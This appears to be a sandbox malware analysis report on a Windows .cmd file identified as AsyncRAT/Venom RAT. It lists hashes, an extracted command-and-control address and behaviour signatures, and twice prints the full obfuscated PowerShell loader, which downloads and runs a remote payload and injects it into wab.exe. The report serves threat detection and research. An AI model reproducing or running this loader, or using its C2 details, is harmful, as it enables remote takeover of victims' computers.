Overview

overview

10

Static

static

1

13032024_1...ws.cmd

windows7-x64

1

13032024_1...ws.cmd

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-03-2024 09:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    13032024_1706_windows.cmd

  • Size

    5KB

  • MD5

    785491421e9b7a936c34683d262e0788

  • SHA1

    98a4e2f3797b338cc0faa98b5f122aae27eb13d1

  • SHA256

    b6ee4e50033f168d033d2b58defc9429f5bed66f2bcc22a364cebe45cd20c5ef

  • SHA512

    fb3c2f37c5ddbecf65236feb05cecd7b496143a9ad30519d6d418ef9d8f5fe9cd84096faea4a37e4bead89e45e2561ef4ab6456e3d5699506df6f6d1f33d43e0

  • SSDEEP

    96:VowFJmmJtABRbPYhB4deDT0tiU/9fSa2cWzTBxdOHKsHNovFDWjU08J+5bgnFvb4:VowFJ3XgSIdeDYtiS9fSm4TBCHKsavFC

Score
10/10
asyncratvenom clientsrat

Malware Config

Extracted

Family

asyncrat

Version

5.0.5

Botnet

Venom Clients

C2

154.30.255.175:8890

Mutex

Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\13032024_1706_windows.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:972
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "++$Zeunerite;++$Zeunerite;$Zeunerite=$Zeunerite-1;Function Aarsagerne ($Udkommanderingernes){$Datolysets=5;$Datolysets++;For($Kolerikeres=5; $Kolerikeres -lt $Udkommanderingernes.Length-1; $Kolerikeres+=$Datolysets){$Skgpest = 'substring';$Sanmarineseres=$Udkommanderingernes.$Skgpest.Invoke($Kolerikeres, 1);$Rugger=$Rugger+$Sanmarineseres}$Rugger;}$Tiffish=Aarsagerne 'Letteh,otostUforatRekorp f lesshort:Satu / Emul/nonc k Pr siRanchsLderjaBeskan viisbR.efoeOverat.ocarhU,sewaFoliok Tres. agerc ,ubaoInclamBrina/Mo.toPDacry/ .hilT Snfty Disbn arendEstraeVip en aneldForede.jusk.P ukkdErhves udvapTrave ';$Adresseinformationer=$Tiffish.split([char]62);$Tiffish=$Adresseinformationer[0];$Skifte=Aarsagerne ' UdviiLdereeStatoxRubbe ';$Polyideic = Aarsagerne 'Kalkm\BroilsMultiy AftrsBabylwhovedoDikkew Sand6 Extr4Hoved\ AflsWPrankiMisinnRagendGgedeoAfdrawSnapjs protP.affeoTerebw Ga.teChefmrHgebrSOutgahMe,sae Ved.lAkkumlbvssl\ShadovP rit1.risb.Rigge0 ank\N ttep ForkoUnconwN.ndieArchhr S,ils Seksh lab,eDemitlKonomlHeksa.E.ogeeF.ottxAddereUn,en ';.($Skifte) (Aarsagerne 'Brugt$PolyoL,psoanExporn Un.te Suevnawes.d St teRingss dem 2Altru2Resnd=Proph$Ving eUnhernSpermvprero:RedouwProadiEvidenPondedMartii Bistr So,a ') ;.($Skifte) (Aarsagerne ' Phon$Pav.nPFlibbo Lu tlSsteryUdsyriKraned Ugree D,ckiT.lnecFangs=Forsk$Sou bLT,lsanGu venkrakee towanD.cimdLyknseH,bils Skiv2Storb2primo+Ufors$BortrPTeo roWashllvigneyIndheiHur.ad Arroecos oiTumorc .nex ') ;.($Skifte) (Aarsagerne 'Rubbl$i,troESthenl Vedge begrcViltrt,ubilretiquiB.llsoCave,nSetbaiCatfacDr.it Af al=Lens. Re.a(Op.dr( Sublg tenwHomesmGo,dii,ervi Bootsw.undri woe.n,ngde3Mo oz2.okss_ForsypVerrurAdap.o .oppcUdemre Pa,tsXalossSynch Skoma- SpkkFSe.es .arbP PlumrSalvaoAf.ifcDyrkeeCosmosKatolsTkke I Sv gdVr,nt=Oper.$Ti,ht{Acc sPToperIMetalDTubul}Outco) Jasm.SagsgCStatsoLiniymK ssemfacieaVest nAlmacd S reL Sirri ockenSan he Elec)Unsav Ejend-systesLevnepA eisl BodyiM crot toba pr,ce[ OvercElecthblaakaDdtrtrTredj]Baubo3Kingw4color ');.($Skifte) (Aarsagerne 'Pirre$ddmanBS andoPerreuOpistb.fkaso Resiu T.igs Reyo Subs=Ichne Van,l$Si,yfEEnterlInviieTetracCathatEv,ntrCoevaiS.ncto EftenBigeliOku,ecRe ap[S,agg$ PharEUar ilArtl.eImprocanth,t StabrForgoiApprooExaggn Par.iBaan.c Tils..lutocZloteoOuttauBas.in ,hent rick-Mal,e2Nonad]Seism ');.($Skifte) (Aarsagerne 'Top.p$W.lgaEKaut vmultiePhotonForbieUdtradV.dhn=Udt,e( ,utoTB.akeeNumissAbbretPlen.-UtilbPOver a KodrtYojanhSamme No gi$ass,rP stivoAtt,ilHorriyLandbiUmorad du,leAutopi.ennecAnaem)I.dta Brdde-NucicA ightnGrantdcoadm je,aa(Terri[ prinI MedlnBlandtAst.oPNo.mitSuld.runder]Hy.ri:melan:lineysSymboiUreoszPrefoeVedhn Ledig-ElecteskydeqBasel Ek.pe8Arbej)Klapp ') ;if ($Evened) {.$Polyideic $Boubous;} else {;$Faksimileudgavens=Aarsagerne 'Quin.SUnwort An,ea,eddirBoremtJ sti-Rea,pBUds.iiPar st BjlksSkoggTTaxafrTimbraCen rnBedtisNumerfUdlaaeSociarNit,r Bl,ds-BekenS demaoTimabuMatutrUneracAdigheSangu nonex$AfhenTSump iInonefBrut fDemoniP.pers SubphBenef S,tur-Man.sDChowdeSensasPara,t Mixti AcednBlac,aPistotFrkn iFremfoB.lignU.bor Unlu,$,hotoLParaln EthonHamsteStasin ,uzedUns,le,nchysDi,se2Con a2Hyali ';.($Skifte) (Aarsagerne 'Navne$IntraL Denun rlovnAltereBrasenSkydedTid.neBredbs,arne2 Fina2 Neds=inter$ ordeeVedisnFattevRever:KorreaBardlpAcroppRandid UnesaIonistBloomaRente ') ;.($Skifte) (Aarsagerne 'Hist.Iregi.m Se,vpBepudo He grEvinctMe,yl-ka peMChampo K,ttd FletuKulanlUmisfeOpsti BardeBZoolii A,skt R,vistank,TReinvr CoveaDeforn .rimsKlokkf andle,ohesrSideo ') ;$Lnnendes22=$Lnnendes22+'\Trinskifters.Lkk';while (-not $Sekretariatsmedarbejderne238) {.($Skifte) (Aarsagerne 'Mi.ds$Ba inSM.moreLindek,risirFranceRa int Cu,ga,luterBenefiRansaa.andetEven s Pa.am,kumrePl,ntd Cal,aSkarprSolo.b.hinne Attaj Vi dd dskyeDuncerHundenlib ieVau,h2 Fors3Ragma8Despa=Plan,(UdemiTproloeginnes im rtBlsev-PundePStandaTidsstInterhelegi Forlo$MottoLI.ternStalanKdgryeUnpern Amind She,eOvermsJernb2Sekst2epi.o)Carer ') ;.($Skifte) $Faksimileudgavens;.($Skifte) (Aarsagerne 'Fora,ST,evet SlapaSummerMagtmtBenef-Coa,eSKurmalPosereByproeHeliap Tuli Outta5Data. ');$Tiffish=$Adresseinformationer[$Brnetestamente++%$Adresseinformationer.count];}.($Skifte) (Aarsagerne ' had$Or,anSTotaltFertivVrdigeCranin.romidForbeeNatti Udela=Hunde As.erG.oweleRedo,tForma-RiksmC,rystoMotornpie.otDemateHandlnDommetUnder G de$Mu saL MusinCalcunHov,deNonenn Mu.kd,ndopePatolsRibbo2 resi2Sv,ni ');.($Skifte) (Aarsagerne 'Edomi$D iftBSpooly arveg,endeg,ggree At.of HypoeBrownjAlk,hl,nodoeNive nRoeg sSphae Fligl=Mexic Po pe[,ebygSTalboyS.irisS,olet ardie Levem onek. FrapCStanloSlyngn ChilvSherie SalmrM,numt Afte]Blin.:Bi na:raderFlandsr St,ioGr vemIn,erBFue iaS.ionsRakeleRoev.6Botsw4MetanSSwimwt BonerA.chiiBefalnP ggegDefo.( Reli$ hancSIntertGone vOrthoeH,ternHidaldShe ieOverp)Zobl, ');.($Skifte) (Aarsagerne ',koff$proteCBoyunaIso.nrMastobVe icoEyebenHydroiLogermSkr giUnappdforsyeKa.ak Kodri=Efter mikr[HildeSTipsty ,urosHelbrtBrmmeepopkumS kto.SkarnT Attie Bowlx An,rtUdgiv.Anal.EUdrydnSpillcHowi oAmph dPa,tsi coagnbra,ig Spec]Somme:Darwi:LuxusA HellSFeberCDiagnIBenziI ange. .yngGThorseKom.ltHemomSkrambtDe,serNo.voi FjerntransgHonn.(,irog$Fle.tBantedyKa yogC,umpg sydfe erof PemmesnydejYogu.lSikkee UdganImm,gscr,no)Vrdis ');.($Skifte) (Aarsagerne ' ilm$StorvPBankarGlissoOryzol ,ntyereconp drvttInboaiBioanc ,rbesDirek=Per,e$LampeCIndu.aThreprSmarabtarb,ob ldenEnsuiiUns lmAho kiMaystdIdenteastuc. derbsSchizuR.mmebPr.slsMaanetStormrTrammiFicusnEftergEdgeo( Ibru3Uigur4Kinde1Antel5,vert9Drvty1Bewra,Lejd,2 P eb5cambo1Hjred6Bar.i0Berve)Turn ');.($Skifte) $Proleptics;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5432
      • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$Zeunerite;++$Zeunerite;$Zeunerite=$Zeunerite-1;Function Aarsagerne ($Udkommanderingernes){$Datolysets=5;$Datolysets++;For($Kolerikeres=5; $Kolerikeres -lt $Udkommanderingernes.Length-1; $Kolerikeres+=$Datolysets){$Skgpest = 'substring';$Sanmarineseres=$Udkommanderingernes.$Skgpest.Invoke($Kolerikeres, 1);$Rugger=$Rugger+$Sanmarineseres}$Rugger;}$Tiffish=Aarsagerne 'Letteh,otostUforatRekorp f lesshort:Satu / Emul/nonc k Pr siRanchsLderjaBeskan viisbR.efoeOverat.ocarhU,sewaFoliok Tres. agerc ,ubaoInclamBrina/Mo.toPDacry/ .hilT Snfty Disbn arendEstraeVip en aneldForede.jusk.P ukkdErhves udvapTrave ';$Adresseinformationer=$Tiffish.split([char]62);$Tiffish=$Adresseinformationer[0];$Skifte=Aarsagerne ' UdviiLdereeStatoxRubbe ';$Polyideic = Aarsagerne 'Kalkm\BroilsMultiy AftrsBabylwhovedoDikkew Sand6 Extr4Hoved\ AflsWPrankiMisinnRagendGgedeoAfdrawSnapjs protP.affeoTerebw Ga.teChefmrHgebrSOutgahMe,sae Ved.lAkkumlbvssl\ShadovP rit1.risb.Rigge0 ank\N ttep ForkoUnconwN.ndieArchhr S,ils Seksh lab,eDemitlKonomlHeksa.E.ogeeF.ottxAddereUn,en ';.($Skifte) (Aarsagerne 'Brugt$PolyoL,psoanExporn Un.te Suevnawes.d St teRingss dem 2Altru2Resnd=Proph$Ving eUnhernSpermvprero:RedouwProadiEvidenPondedMartii Bistr So,a ') ;.($Skifte) (Aarsagerne ' Phon$Pav.nPFlibbo Lu tlSsteryUdsyriKraned Ugree D,ckiT.lnecFangs=Forsk$Sou bLT,lsanGu venkrakee towanD.cimdLyknseH,bils Skiv2Storb2primo+Ufors$BortrPTeo roWashllvigneyIndheiHur.ad Arroecos oiTumorc .nex ') ;.($Skifte) (Aarsagerne 'Rubbl$i,troESthenl Vedge begrcViltrt,ubilretiquiB.llsoCave,nSetbaiCatfacDr.it Af al=Lens. Re.a(Op.dr( Sublg tenwHomesmGo,dii,ervi Bootsw.undri woe.n,ngde3Mo oz2.okss_ForsypVerrurAdap.o .oppcUdemre Pa,tsXalossSynch Skoma- SpkkFSe.es .arbP PlumrSalvaoAf.ifcDyrkeeCosmosKatolsTkke I Sv gdVr,nt=Oper.$Ti,ht{Acc sPToperIMetalDTubul}Outco) Jasm.SagsgCStatsoLiniymK ssemfacieaVest nAlmacd S reL Sirri ockenSan he Elec)Unsav Ejend-systesLevnepA eisl BodyiM crot toba pr,ce[ OvercElecthblaakaDdtrtrTredj]Baubo3Kingw4color ');.($Skifte) (Aarsagerne 'Pirre$ddmanBS andoPerreuOpistb.fkaso Resiu T.igs Reyo Subs=Ichne Van,l$Si,yfEEnterlInviieTetracCathatEv,ntrCoevaiS.ncto EftenBigeliOku,ecRe ap[S,agg$ PharEUar ilArtl.eImprocanth,t StabrForgoiApprooExaggn Par.iBaan.c Tils..lutocZloteoOuttauBas.in ,hent rick-Mal,e2Nonad]Seism ');.($Skifte) (Aarsagerne 'Top.p$W.lgaEKaut vmultiePhotonForbieUdtradV.dhn=Udt,e( ,utoTB.akeeNumissAbbretPlen.-UtilbPOver a KodrtYojanhSamme No gi$ass,rP stivoAtt,ilHorriyLandbiUmorad du,leAutopi.ennecAnaem)I.dta Brdde-NucicA ightnGrantdcoadm je,aa(Terri[ prinI MedlnBlandtAst.oPNo.mitSuld.runder]Hy.ri:melan:lineysSymboiUreoszPrefoeVedhn Ledig-ElecteskydeqBasel Ek.pe8Arbej)Klapp ') ;if ($Evened) {.$Polyideic $Boubous;} else {;$Faksimileudgavens=Aarsagerne 'Quin.SUnwort An,ea,eddirBoremtJ sti-Rea,pBUds.iiPar st BjlksSkoggTTaxafrTimbraCen rnBedtisNumerfUdlaaeSociarNit,r Bl,ds-BekenS demaoTimabuMatutrUneracAdigheSangu nonex$AfhenTSump iInonefBrut fDemoniP.pers SubphBenef S,tur-Man.sDChowdeSensasPara,t Mixti AcednBlac,aPistotFrkn iFremfoB.lignU.bor Unlu,$,hotoLParaln EthonHamsteStasin ,uzedUns,le,nchysDi,se2Con a2Hyali ';.($Skifte) (Aarsagerne 'Navne$IntraL Denun rlovnAltereBrasenSkydedTid.neBredbs,arne2 Fina2 Neds=inter$ ordeeVedisnFattevRever:KorreaBardlpAcroppRandid UnesaIonistBloomaRente ') ;.($Skifte) (Aarsagerne 'Hist.Iregi.m Se,vpBepudo He grEvinctMe,yl-ka peMChampo K,ttd FletuKulanlUmisfeOpsti BardeBZoolii A,skt R,vistank,TReinvr CoveaDeforn .rimsKlokkf andle,ohesrSideo ') ;$Lnnendes22=$Lnnendes22+'\Trinskifters.Lkk';while (-not $Sekretariatsmedarbejderne238) {.($Skifte) (Aarsagerne 'Mi.ds$Ba inSM.moreLindek,risirFranceRa int Cu,ga,luterBenefiRansaa.andetEven s Pa.am,kumrePl,ntd Cal,aSkarprSolo.b.hinne Attaj Vi dd dskyeDuncerHundenlib ieVau,h2 Fors3Ragma8Despa=Plan,(UdemiTproloeginnes im rtBlsev-PundePStandaTidsstInterhelegi Forlo$MottoLI.ternStalanKdgryeUnpern Amind She,eOvermsJernb2Sekst2epi.o)Carer ') ;.($Skifte) $Faksimileudgavens;.($Skifte) (Aarsagerne 'Fora,ST,evet SlapaSummerMagtmtBenef-Coa,eSKurmalPosereByproeHeliap Tuli Outta5Data. ');$Tiffish=$Adresseinformationer[$Brnetestamente++%$Adresseinformationer.count];}.($Skifte) (Aarsagerne ' had$Or,anSTotaltFertivVrdigeCranin.romidForbeeNatti Udela=Hunde As.erG.oweleRedo,tForma-RiksmC,rystoMotornpie.otDemateHandlnDommetUnder G de$Mu saL MusinCalcunHov,deNonenn Mu.kd,ndopePatolsRibbo2 resi2Sv,ni ');.($Skifte) (Aarsagerne 'Edomi$D iftBSpooly arveg,endeg,ggree At.of HypoeBrownjAlk,hl,nodoeNive nRoeg sSphae Fligl=Mexic Po pe[,ebygSTalboyS.irisS,olet ardie Levem onek. FrapCStanloSlyngn ChilvSherie SalmrM,numt Afte]Blin.:Bi na:raderFlandsr St,ioGr vemIn,erBFue iaS.ionsRakeleRoev.6Botsw4MetanSSwimwt BonerA.chiiBefalnP ggegDefo.( Reli$ hancSIntertGone vOrthoeH,ternHidaldShe ieOverp)Zobl, ');.($Skifte) (Aarsagerne ',koff$proteCBoyunaIso.nrMastobVe icoEyebenHydroiLogermSkr giUnappdforsyeKa.ak Kodri=Efter mikr[HildeSTipsty ,urosHelbrtBrmmeepopkumS kto.SkarnT Attie Bowlx An,rtUdgiv.Anal.EUdrydnSpillcHowi oAmph dPa,tsi coagnbra,ig Spec]Somme:Darwi:LuxusA HellSFeberCDiagnIBenziI ange. .yngGThorseKom.ltHemomSkrambtDe,serNo.voi FjerntransgHonn.(,irog$Fle.tBantedyKa yogC,umpg sydfe erof PemmesnydejYogu.lSikkee UdganImm,gscr,no)Vrdis ');.($Skifte) (Aarsagerne ' ilm$StorvPBankarGlissoOryzol ,ntyereconp drvttInboaiBioanc ,rbesDirek=Per,e$LampeCIndu.aThreprSmarabtarb,ob ldenEnsuiiUns lmAho kiMaystdIdenteastuc. derbsSchizuR.mmebPr.slsMaanetStormrTrammiFicusnEftergEdgeo( Ibru3Uigur4Kinde1Antel5,vert9Drvty1Bewra,Lejd,2 P eb5cambo1Hjred6Bar.i0Berve)Turn ');.($Skifte) $Proleptics;}"
        3⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5976
        • C:\Program Files (x86)\windows mail\wab.exe
          "C:\Program Files (x86)\windows mail\wab.exe"
          4⤵
          • Suspicious use of NtCreateThreadExHideFromDebugger
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of AdjustPrivilegeToken
          PID:4640
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4028 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:8
    1⤵
      PID:5516

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1urigjqb.rk0.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit
    • memory/4640-70-0x0000000020C70000-0x0000000020C80000-memory.dmp
      Filesize

      64KB

      Download
    • memory/4640-65-0x0000000074D80000-0x0000000075530000-memory.dmp
      Filesize

      7.7MB

      Download
    • memory/4640-71-0x0000000077801000-0x0000000077802000-memory.dmp
      Filesize

      4KB

      Download
    • memory/4640-54-0x0000000077828000-0x0000000077829000-memory.dmp
      Filesize

      4KB

      Download
    • memory/4640-77-0x0000000020C70000-0x0000000020C80000-memory.dmp
      Filesize

      64KB

      Download
    • memory/4640-76-0x0000000074D80000-0x0000000075530000-memory.dmp
      Filesize

      7.7MB

      Download
    • memory/4640-74-0x00000000777A1000-0x00000000778C1000-memory.dmp
      Filesize

      1.1MB

      Download
    • memory/4640-72-0x0000000023400000-0x000000002349C000-memory.dmp
      Filesize

      624KB

      Download
    • memory/4640-55-0x00000000777A1000-0x00000000778C1000-memory.dmp
      Filesize

      1.1MB

      Download
    • memory/4640-62-0x0000000000AD0000-0x0000000001D24000-memory.dmp
      Filesize

      18.3MB

      Download
    • memory/4640-64-0x0000000000AD0000-0x0000000000AE6000-memory.dmp
      Filesize

      88KB

      Download
    • memory/5432-2-0x00000181C21F0000-0x00000181C2212000-memory.dmp
      Filesize

      136KB

      Download
    • memory/5432-32-0x00007FFD83B60000-0x00007FFD84621000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/5432-12-0x00007FFD83B60000-0x00007FFD84621000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/5432-69-0x00007FFD83B60000-0x00007FFD84621000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/5432-44-0x00000181C0140000-0x00000181C0150000-memory.dmp
      Filesize

      64KB

      Download
    • memory/5432-13-0x00000181C0140000-0x00000181C0150000-memory.dmp
      Filesize

      64KB

      Download
    • memory/5432-14-0x00000181C0140000-0x00000181C0150000-memory.dmp
      Filesize

      64KB

      Download
    • memory/5432-43-0x00000181C0140000-0x00000181C0150000-memory.dmp
      Filesize

      64KB

      Download
    • memory/5976-21-0x0000000005BB0000-0x0000000005C16000-memory.dmp
      Filesize

      408KB

      Download
    • memory/5976-37-0x0000000006920000-0x000000000693A000-memory.dmp
      Filesize

      104KB

      Download
    • memory/5976-41-0x00000000079B0000-0x00000000079D2000-memory.dmp
      Filesize

      136KB

      Download
    • memory/5976-42-0x0000000007A40000-0x0000000007A54000-memory.dmp
      Filesize

      80KB

      Download
    • memory/5976-39-0x0000000007560000-0x0000000007582000-memory.dmp
      Filesize

      136KB

      Download
    • memory/5976-38-0x00000000075D0000-0x0000000007666000-memory.dmp
      Filesize

      600KB

      Download
    • memory/5976-45-0x0000000074D80000-0x0000000075530000-memory.dmp
      Filesize

      7.7MB

      Download
    • memory/5976-46-0x0000000002A30000-0x0000000002A40000-memory.dmp
      Filesize

      64KB

      Download
    • memory/5976-48-0x0000000002A30000-0x0000000002A40000-memory.dmp
      Filesize

      64KB

      Download
    • memory/5976-49-0x0000000002A30000-0x0000000002A40000-memory.dmp
      Filesize

      64KB

      Download
    • memory/5976-50-0x0000000007A30000-0x0000000007A31000-memory.dmp
      Filesize

      4KB

      Download
    • memory/5976-51-0x0000000008930000-0x000000000C059000-memory.dmp
      Filesize

      55.2MB

      Download
    • memory/5976-52-0x00000000777A1000-0x00000000778C1000-memory.dmp
      Filesize

      1.1MB

      Download
    • memory/5976-40-0x0000000008380000-0x0000000008924000-memory.dmp
      Filesize

      5.6MB

      Download
    • memory/5976-36-0x0000000007D00000-0x000000000837A000-memory.dmp
      Filesize

      6.5MB

      Download
    • memory/5976-35-0x0000000002A30000-0x0000000002A40000-memory.dmp
      Filesize

      64KB

      Download
    • memory/5976-34-0x00000000063F0000-0x000000000643C000-memory.dmp
      Filesize

      304KB

      Download
    • memory/5976-66-0x0000000074D80000-0x0000000075530000-memory.dmp
      Filesize

      7.7MB

      Download
    • memory/5976-33-0x0000000006360000-0x000000000637E000-memory.dmp
      Filesize

      120KB

      Download
    • memory/5976-27-0x0000000005CE0000-0x0000000006034000-memory.dmp
      Filesize

      3.3MB

      Download
    • memory/5976-20-0x0000000005B40000-0x0000000005BA6000-memory.dmp
      Filesize

      408KB

      Download
    • memory/5976-19-0x00000000053E0000-0x0000000005402000-memory.dmp
      Filesize

      136KB

      Download
    • memory/5976-18-0x0000000005410000-0x0000000005A38000-memory.dmp
      Filesize

      6.2MB

      Download
    • memory/5976-17-0x00000000029D0000-0x0000000002A06000-memory.dmp
      Filesize

      216KB

      Download
    • memory/5976-16-0x0000000002A30000-0x0000000002A40000-memory.dmp
      Filesize

      64KB

      Download
    • memory/5976-15-0x0000000074D80000-0x0000000075530000-memory.dmp
      Filesize

      7.7MB

      Download